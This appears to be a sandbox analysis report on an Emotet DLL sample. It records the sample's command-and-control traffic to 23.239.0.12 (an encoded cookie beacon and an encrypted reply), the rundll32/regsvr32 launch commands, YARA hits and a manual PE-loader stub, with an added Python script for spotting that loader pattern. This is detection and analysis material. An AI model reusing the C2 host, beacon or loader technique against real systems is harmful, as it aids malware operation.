DllUnregisterServer | 2 | 0x180042080
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 14, 2022 05:02:21.286027908 CEST | 49754 | 443 | 192.168.2.5 | 23.239.0.12
May 14, 2022 05:02:21.286073923 CEST | 443 | 49754 | 23.239.0.12 | 192.168.2.5
May 14, 2022 05:02:21.286159039 CEST | 49754 | 443 | 192.168.2.5 | 23.239.0.12
May 14, 2022 05:02:21.323476076 CEST | 49754 | 443 | 192.168.2.5 | 23.239.0.12
May 14, 2022 05:02:21.323508024 CEST | 443 | 49754 | 23.239.0.12 | 192.168.2.5
May 14, 2022 05:02:21.901115894 CEST | 443 | 49754 | 23.239.0.12 | 192.168.2.5
May 14, 2022 05:02:21.901314020 CEST | 49754 | 443 | 192.168.2.5 | 23.239.0.12
May 14, 2022 05:02:22.493140936 CEST | 49754 | 443 | 192.168.2.5 | 23.239.0.12
May 14, 2022 05:02:22.493186951 CEST | 443 | 49754 | 23.239.0.12 | 192.168.2.5
May 14, 2022 05:02:22.493604898 CEST | 443 | 49754 | 23.239.0.12 | 192.168.2.5
May 14, 2022 05:02:22.493717909 CEST | 49754 | 443 | 192.168.2.5 | 23.239.0.12
May 14, 2022 05:02:22.514161110 CEST | 49754 | 443 | 192.168.2.5 | 23.239.0.12
May 14, 2022 05:02:22.556518078 CEST | 443 | 49754 | 23.239.0.12 | 192.168.2.5
May 14, 2022 05:02:23.362123966 CEST | 443 | 49754 | 23.239.0.12 | 192.168.2.5
May 14, 2022 05:02:23.362224102 CEST | 443 | 49754 | 23.239.0.12 | 192.168.2.5
May 14, 2022 05:02:23.362298012 CEST | 49754 | 443 | 192.168.2.5 | 23.239.0.12
May 14, 2022 05:02:23.362323999 CEST | 49754 | 443 | 192.168.2.5 | 23.239.0.12
May 14, 2022 05:02:23.370688915 CEST | 49754 | 443 | 192.168.2.5 | 23.239.0.12
May 14, 2022 05:02:23.370733023 CEST | 443 | 49754 | 23.239.0.12 | 192.168.2.5
                                                                    • 23.239.0.12
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49754 | 23.239.0.12 | 443 | C:\Windows\System32\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-14 03:02:22 UTC | 0 | OUT | GET / HTTP/1.1
                                                                    Cookie: IGSITR=HJk2yqksn3jmOrlkjuqjRrOytL36Pszs0ofIX1jQk/Be1o+ZJK3BH16JgDf6yAW8We2QNZiNZF73x9i8Cr/2lwvuBtCMCqzhtUwH+utXxsaxxeFDiVcXHUnp3RcBPjBK+vqM6Yo3emfENRl9L6E53er+8Ox9ZdSnyBQfUVQqeHCdHLzs9KZ3O1oQ2HgwwRbSVRqsfC5SKTAY5vWLOF/LM1SbrwAwiegfKUsIcWEPMGL5FEJ++dJKJpd/eExNxiNWyzVFKkd3XdxdxGxunr8=
                                                                    Host: 23.239.0.12
                                                                    Connection: Keep-Alive
                                                                    Cache-Control: no-cache
2022-05-14 03:02:23 UTC | 0 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Sat, 14 May 2022 03:02:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
2022-05-14 03:02:23 UTC | 0 | IN | Data Raw: 31 65 66 0d 0a ca 95 01 92 be 7c 69 6a 2c 0d fc 2f ba 99 cd b0 85 0f b7 26 fd 83 a8 76 b6 86 4d 6a 51 8f 93 2d f6 e9 12 f0 77 2f 1c a6 7b e1 ac 7b 64 c9 c9 24 34 86 0c 86 66 50 28 dc af 83 57 92 26 68 14 39 0f 8d af 6e 6f 73 ca 0d ff 47 77 9b a5 ab a7 d9 18 c1 23 5f 7a e5 ac 59 ad 1b 9f 58 29 00 3c da d5 d6 8a ba d8 d7 00 e7 cb 6c a6 82 37 28 a6 bb 0a ed 23 9d b2 26 6c 62 17 64 3f a8 3e ca 8d d5 10 cd fc c1 48 bb 6b 9d 49 22 72 40 c0 b4 db c3 f7 dd 44 87 3a 62 b4 b3 50 8b 3c ed 54 65 9d 11 1a 75 de a1 95 a8 7d 7c 47 3b 36 88 3c 21 e2 28 27 f6 ff 2b ba 69 1f 83 9c a4 03 1f 2f a4 28 d8 54 81 ff 7f 8a 20 b8 37 f0 e4 0e 65 ed 63 fb 2e 1f 49 e0 2f 22 9e 17 2b 28 7d f0 bb d6 87 62 43 95 5d e2 1d 40 28 aa b8 05 7a fe 39 91 7e d1 17 63 d4 83 40 f3 33 ca ee 4b 8e
                                                                    Data Ascii: 1ef|ij,/&vMjQ-w/{{d$4fP(W&h9nosGw#_zYX)<l7(#&lbd?>HkI"r@D:bP<Teu}|G;6<!('+i/(T 7ec.I/"+(}bC]@(z9~c@3K

                                                                    Target ID:1
                                                                    Start time:05:01:50
                                                                    Start date:14/05/2022
                                                                    Path:C:\Windows\System32\loaddll64.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:loaddll64.exe "C:\Users\user\Desktop\2V7zjcga5L.dll"
                                                                    Imagebase:0x7ff66e0c0000
                                                                    File size:140288 bytes
                                                                    MD5 hash:4E8A40CAD6CCC047914E3A7830A2D8AA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:2
                                                                    Start time:05:01:51
                                                                    Start date:14/05/2022
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2V7zjcga5L.dll",#1
                                                                    Imagebase:0x7ff602050000
                                                                    File size:273920 bytes
                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:3
                                                                    Start time:05:01:51
                                                                    Start date:14/05/2022
                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:regsvr32.exe /s C:\Users\user\Desktop\2V7zjcga5L.dll
                                                                    Imagebase:0x7ff750710000
                                                                    File size:24064 bytes
                                                                    MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.443771907.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high

                                                                    Target ID:4
                                                                    Start time:05:01:51
                                                                    Start date:14/05/2022
                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\2V7zjcga5L.dll",#1
                                                                    Imagebase:0x7ff7040a0000
                                                                    File size:69632 bytes
                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.447104613.00000230423C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.446272102.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high

                                                                    Target ID:5
                                                                    Start time:05:01:52
                                                                    Start date:14/05/2022
                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\2V7zjcga5L.dll,DllRegisterServer
                                                                    Imagebase:0x7ff7040a0000
                                                                    File size:69632 bytes
                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.444094574.0000028DC9D20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high

                                                                    Target ID:6
                                                                    Start time:05:01:55
                                                                    Start date:14/05/2022
                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\2V7zjcga5L.dll,DllUnregisterServer
                                                                    Imagebase:0x7ff7040a0000
                                                                    File size:69632 bytes
                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:7
                                                                    Start time:05:01:55
                                                                    Start date:14/05/2022
                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\TvhlOU\CPyd.dll"
                                                                    Imagebase:0x7ff750710000
                                                                    File size:24064 bytes
                                                                    MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.828897000.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.829091404.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high

                                                                    Target ID:8
                                                                    Start time:05:02:18
                                                                    Start date:14/05/2022
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                    Imagebase:0x7ff78ca80000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:10
                                                                    Start time:05:02:28
                                                                    Start date:14/05/2022
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                    Imagebase:0x7ff78ca80000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:15
                                                                    Start time:05:03:24
                                                                    Start date:14/05/2022
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                    Imagebase:0x3d0000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:17
                                                                    Start time:05:04:01
                                                                    Start date:14/05/2022
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                    Imagebase:0x7ff78ca80000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:18
                                                                    Start time:05:04:20
                                                                    Start date:14/05/2022
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                    Imagebase:0x7ff78ca80000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:20
                                                                    Start time:05:04:37
                                                                    Start date:14/05/2022
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                    Imagebase:0x7ff78ca80000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language


                                                                      Execution Graph

                                                                      Execution Coverage:9.7%
                                                                      Dynamic/Decrypted Code Coverage:1.6%
                                                                      Signature Coverage:15.8%
                                                                      Total number of Nodes:678
                                                                      Total number of Limit Nodes:6
                                                                      [Execution graph: node/edge listing of the interactive view, summarised by root and the API calls reachable from it]
                                                                      - 0x1020000 (loader stub): VirtualAlloc (0x102043e) -> GetNativeSystemInfo (0x1020531) -> VirtualAlloc (0x102056d) -> VirtualProtect (0x10209d9, inside a loop) -> RtlAddFunctionTable (0x1020a56) -> exit at 0x1020a7b. Allocate, re-protect per section, then register x64 unwind tables is the shape of a manual PE mapper.
                                                                      - 0x7ffa526a1ee7: RtlAllocateHeap, RtlDeleteBoundaryDescriptor.
                                                                      - 0x7ffa526a2290 -> 0x7ffa526a2154: C runtime start-up. HeapCreate/HeapSetInformation, FlsAlloc/FlsSetValue/FlsGetValue/FlsFree, GetCommandLineA, GetEnvironmentStringsW/GetEnvironmentStrings/FreeEnvironmentStringsW/FreeEnvironmentStringsA, WideCharToMultiByte/MultiByteToWideChar, GetStartupInfoA, GetStdHandle/GetFileType/SetHandleCount, InitializeCriticalSectionAndSpinCount, GetModuleFileNameA, _tzset, _cinit/_initterm_e, GetOEMCP/GetACP/GetCPInfo/IsValidCodePage, GetLocaleInfoA, LCMapStringW/LCMapStringA/GetStringTypeW/GetStringTypeA, EncodePointer/DecodePointer, Sleep, GetCurrentThreadId, GetLastError/SetLastError. Its failure path runs RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess (the source of the "IsDebuggerPresent" and "checks if the current process is being debugged" signatures); the exit helper at 0x7ffa526a3310 does GetModuleHandleW/GetProcAddress/ExitProcess, and the message banner path writes to GetStdHandle via WriteFile.
                                                                      - 0x7ffa52661230: wcsftime; 0x7ffa526a2050 -> 0x7ffa52661000 -> ExitProcess.
                                                                      The remaining nodes are CRT allocator and locale helpers (free, realloc, _errno, _lock, _getptd, __initmbctable, __setargv, __wtomb_environ) carrying "NN API calls" summary labels.
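The execution-graph listing above is a flat token stream: a decimal node id, a hex address, zero or more labels (API names, CRT helper names, "NN API calls" summaries) and `src->dst` edges. The following Python is an added example and not part of the Joe Sandbox report or its tooling: it parses that stream, collects the API call sites reachable from a chosen root and orders them by address, then applies a small manual-mapper heuristic that is my own reading of the VirtualAlloc / VirtualProtect / RtlAddFunctionTable sequence rather than a sandbox signature. The input is the 0x1020000 subgraph copied from this report; the assumption that ascending address approximates linear order inside one function is stated in the code.

```python
import re
from collections import defaultdict

# Constructed input: the 0x1020000 subgraph of the execution_graph token
# stream, copied from the report above (the rest of the listing is CRT code).
SAMPLE_GRAPH = (
    "execution_graph 9663 1020000 9664 1020183 9663->9664 9665 102043e VirtualAlloc "
    "9664->9665 9669 1020462 9665->9669 9666 1020a7b 9667 1020531 GetNativeSystemInfo "
    "9667->9666 9668 102056d VirtualAlloc 9667->9668 9673 102058b 9668->9673 9669->9666 "
    "9669->9667 9670 1020a00 9670->9666 9671 1020a56 RtlAddFunctionTable 9670->9671 "
    "9671->9666 9672 10209d9 VirtualProtect 9672->9673 9673->9670 9673->9672"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")      # "9663->9664"
ADDR_RE = re.compile(r"^[0-9a-f]{6,16}$")    # hex address that follows a node id
API_RE = re.compile(r"^[A-Z][A-Za-z0-9]+$")  # Win32/NT API names; CRT helpers are lowercase or _-prefixed
NOT_API = {"API"}                            # from summary labels such as "45 API calls"


def parse_execution_graph(text):
    """Return (nodes, edges): nodes[id] = {"addr": hex str, "labels": [...]},
    edges[src] = [dst, ...] in order of appearance.

    A node starts with a decimal id immediately followed by a hex address;
    every token up to the next node id or edge is a label of that node."""
    tokens = text.split()
    if tokens and tokens[0] == "execution_graph":
        tokens = tokens[1:]
    nodes, edges = {}, defaultdict(list)
    current, i = None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges[m.group(1)].append(m.group(2))
            i += 1
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            current = tok
            nodes[current] = {"addr": tokens[i + 1], "labels": []}
            i += 2
        else:
            if current is not None:
                nodes[current]["labels"].append(tok)
            i += 1
    return nodes, edges


def reachable(nodes, edges, root):
    """Set of node ids reachable from root (edges to undeclared nodes are ignored)."""
    seen, stack = set(), [root]
    while stack:
        n = stack.pop()
        if n in seen or n not in nodes:
            continue
        seen.add(n)
        stack.extend(edges.get(n, []))
    return seen


def api_sequence(nodes, edges, root):
    """(address, api) pairs reachable from root, sorted by address.

    Assumption: the graph encodes control flow, not a timeline, so within a
    single function ascending address is used as a proxy for linear order."""
    calls = []
    for n in reachable(nodes, edges, root):
        for lab in nodes[n]["labels"]:
            if API_RE.match(lab) and lab not in NOT_API:
                calls.append((nodes[n]["addr"], lab))
    return sorted(calls, key=lambda c: int(c[0], 16))


def manual_map_indicators(seq):
    """Heuristic (mine, not a sandbox signature): allocate-then-reprotect plus
    RtlAddFunctionTable is the shape of a manual PE mapper on x64."""
    names = [name for _, name in seq]

    def before(a, b):
        return a in names and b in names and names.index(a) < names.index(b)

    ind = {
        "alloc_then_protect": before("VirtualAlloc", "VirtualProtect"),
        "registers_unwind_tables": "RtlAddFunctionTable" in names,
        "queries_system_info": "GetNativeSystemInfo" in names,
    }
    ind["manual_pe_mapper"] = ind["alloc_then_protect"] and ind["registers_unwind_tables"]
    return ind


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(SAMPLE_GRAPH)
    seq = api_sequence(nodes, edges, "9663")
    for addr, api in seq:
        print(f"0x{addr} {api}")
    print(manual_map_indicators(seq))
```

Running it on the excerpt yields the five call sites in address order (VirtualAlloc, GetNativeSystemInfo, VirtualAlloc, VirtualProtect, RtlAddFunctionTable) and flags the root as a manual PE mapper. Pasting the full listing from the report in place of `SAMPLE_GRAPH` and rooting at 9678 instead returns the CRT start-up calls, which is a quick way to separate the interesting stub from runtime noise.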

                                                                      Control-flow Graph

                                                                      [Control-flow graph of the function at 0x1020000-0x1020aa6, basic blocks only; the executed/not-executed colouring of the interactive view is not preserved]
                                                                      Entry block 0x1020000-0x1020460 calls 0x1020aa8 twice and then VirtualAlloc; 0x1020531-0x1020567 GetNativeSystemInfo; 0x102056d-0x1020589 VirtualAlloc; self-looping blocks at 0x1020468-0x1020488, 0x10205ec-0x1020609, 0x1020722-0x1020784 and 0x10207f2-0x10207f9; 0x10209d9-0x10209e9 VirtualProtect sits inside the loop 0x102093b -> 0x1020945 -> ... -> 0x10209c5 -> 0x10209d9 -> 0x10209ec -> 0x102093b; 0x1020a56-0x1020a79 RtlAddFunctionTable; common exit block 0x1020a91-0x1020aa6.
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.443747782.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1020000_regsvr32.jbxd
Similarity
• API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
• String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
• API String ID: 394283112-2517549848
• Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
• Instruction ID: daac87e62bdd9427a4f63b8bdd19714c523ba83267ea0744a12218712c387fe4
• Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
• Instruction Fuzzy Hash: D572E330618B588FDB69DF18C8856BAB7E1FB98305F10462EE8CBD7215DB34D542CB85
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: #C$(I$-:$Ekf$<W$Z$l$l
• API String ID: 0-464535774
• Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
• Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
• Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
• Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: )|x$/Zb$/v|$OV4T$\$lA
• API String ID: 0-3528011396
• Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
• Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
• Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
• Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: $&.+$)O$.pN$F>9$t(/
• API String ID: 0-3036092626
• Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
• Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
• Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
• Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: :G$Q27$_5$yy8x$Mh
• API String ID: 0-3587547327
• Opcode ID: 315710b1bd8495485e823c5d8e4dda2fa20a4e0309c27e75a691e805bd33ac06
• Instruction ID: f758bc8895b8ed7f582f71be29fb7142b0f1d07f9cbefdc8313849e51cf7b1d3
• Opcode Fuzzy Hash: 315710b1bd8495485e823c5d8e4dda2fa20a4e0309c27e75a691e805bd33ac06
• Instruction Fuzzy Hash: 3DF1E07051434CEBDFA9DF68C8CAA9D3BA0FF48394FA06219FD0696250D775D988CB81
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: +#;)$K'$sf$w\H
• API String ID: 0-1051058546
• Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
• Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
• Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
• Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: <4P$<8$<w.
• API String ID: 0-1030867500
• Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
• Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
• Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
• Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: xDC
• API String ID: 0-90241050
• Opcode ID: 1794493f14346c80bf95ebec7e4fc927d8b172e8d91b7fcff559d0595d0365ee
• Instruction ID: 9121b1bc5c885adbeef7a29f5b0494aad7ac2618abc594bea640adf26706a648
• Opcode Fuzzy Hash: 1794493f14346c80bf95ebec7e4fc927d8b172e8d91b7fcff559d0595d0365ee
• Instruction Fuzzy Hash: F391387052065CEBDB99DF68C8CAADD3BA0FB48394F906219FC4287250C775D9C98B86
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
• Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
• Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
• Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 00007FFA526A4110: HeapCreate.KERNELBASE(?,?,?,?,00007FFA526A2169), ref: 00007FFA526A4122
  • Part of subcall function 00007FFA526A4110: HeapSetInformation.KERNEL32 ref: 00007FFA526A414C
• _RTC_Initialize.LIBCMT ref: 00007FFA526A2184
• GetCommandLineA.KERNEL32 ref: 00007FFA526A2189
  • Part of subcall function 00007FFA526A3EEC: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFA526A219B), ref: 00007FFA526A3F1B
  • Part of subcall function 00007FFA526A3EEC: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFA526A219B), ref: 00007FFA526A3F5B
  • Part of subcall function 00007FFA526A3758: GetStartupInfoA.KERNEL32 ref: 00007FFA526A377D
• __setargv.LIBCMT ref: 00007FFA526A21B2
• _cinit.LIBCMT ref: 00007FFA526A21C6
  • Part of subcall function 00007FFA526A2C94: FlsFree.KERNEL32(?,?,?,?,00007FFA526A2217), ref: 00007FFA526A2CA3
  • Part of subcall function 00007FFA526A2C94: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFA526A2217), ref: 00007FFA526A6A32
  • Part of subcall function 00007FFA526A2C94: free.LIBCMT ref: 00007FFA526A6A3B
  • Part of subcall function 00007FFA526A2C94: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFA526A2217), ref: 00007FFA526A6A5B
  • Part of subcall function 00007FFA526A3108: Sleep.KERNEL32(?,?,0000000A,00007FFA526A2DA3,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A314D
• FlsSetValue.KERNEL32 ref: 00007FFA526A224C
• GetCurrentThreadId.KERNEL32 ref: 00007FFA526A2260
• free.LIBCMT ref: 00007FFA526A226F
